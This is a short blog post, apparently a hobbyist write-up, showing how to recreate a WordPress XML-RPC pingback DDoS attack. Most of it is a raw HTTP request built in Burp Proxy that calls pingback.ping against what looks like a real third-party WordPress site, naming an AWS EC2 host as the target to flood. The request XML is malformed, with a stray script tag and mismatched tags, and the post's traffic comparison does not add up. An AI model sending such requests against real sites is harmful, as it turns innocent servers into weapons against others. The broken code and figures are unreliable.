WordPress XMLRPC.php DDOS Attack

The Bigger They Come, The Harder They Fall

Earlier this year a vulnerability was exploited which used the PingBack feature in WordPress.  I am going to show how to create a request to recreate the attack.  The attack send upwards of 400 Gbps through the internet. By comparison you’re home network is, on a good day, theoretically 100 Mbps. This attack pumped 40x more traffic than your home network can ever do.

 

I created the request in BURP PROXY:

Capture (1)

POST /xmlrpc.php HTTP/1.0
Host: https://prod.nestle-hcp.com.au/breastfeeding/
Content-Type: text/xml
<?xml version=”1.0″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://ec2-107-22-52-34.compute-1.amazonaws.com</string></value>
</param>
<param>
<value>
<string>https://prod.nestle-hcp.com.au/?p=45</script>
<value>
</param>
<params>
</methodCall>

0 thoughts on “WordPress XMLRPC.php DDOS Attack”

Leave a Reply

Your email address will not be published. Required fields are marked *